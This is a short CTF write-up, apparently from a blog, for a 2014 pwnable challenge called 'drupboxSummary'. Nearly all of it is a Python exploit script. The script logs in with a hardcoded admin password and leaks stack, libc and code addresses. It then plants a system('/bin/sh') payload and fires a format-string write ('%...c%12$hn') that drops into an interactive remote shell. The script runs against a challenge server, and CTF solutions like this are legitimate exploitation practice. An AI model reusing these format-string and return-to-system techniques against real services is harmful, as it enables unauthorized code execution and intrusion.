Category : Pwnables
drupboxSummary : make failure chdir(), get admin password, 13byte fsb
Exploit
#!/usr/bin/python from socket import * from struct import pack,unpack p = lambda x:pack("<L",x) s = socket(AF_INET,SOCK_STREAM) s.connect(("localhost",8887)) raw_input() print s.recv(1024) s.send("1\n") print s.recv(1024) s.send("admin\n") print s.recv(1024) s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n") print s.recv(1024) s.send("2\n") print s.recv(1024) s.send("XXXX\n") print s.recv(1024) d = s.recv(1024) stack = unpack("<L",d[4:8])[0]+0xa4 lib = unpack("<L",d[8:12])[0] - 0x39ac4e + 0xe000 code = unpack("<L",d[32:36])[0] - 0x1197 print hex(code) system_addr = lib+0x41260 system_arg = stack - 0x38e read_plt = code + 0xbd0 pppr = code + 0xf47 print hex(stack) print hex(lib) raw_input(">value") num = ((stack&0x0000ffff) - 4)-926 payload = "" payload += p(system_addr) payload += "aaaa" payload += p(system_arg) s.send("4\n") s.recv(1024) s.send("1\n") s.recv(1024) s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/sh\n") s.recv(1024) s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n") s.recv(1024) s.send("5\n") s.recv(1024) s.send("%"+str(num)+"c%12$hn") raw_input(">") s.recv(1024) while 1: comm = raw_input("$") if comm == "exit": break s.send(comm+"\n") print s.recv(1024) |
'CTF > 2014' 카테고리의 다른 글
| CODEGATE CTF 2014 QUAL - weird_snus (0) | 2014.04.20 |
|---|---|
| CODEGATE CTF 2014 QUAL - 4stone (0) | 2014.04.20 |
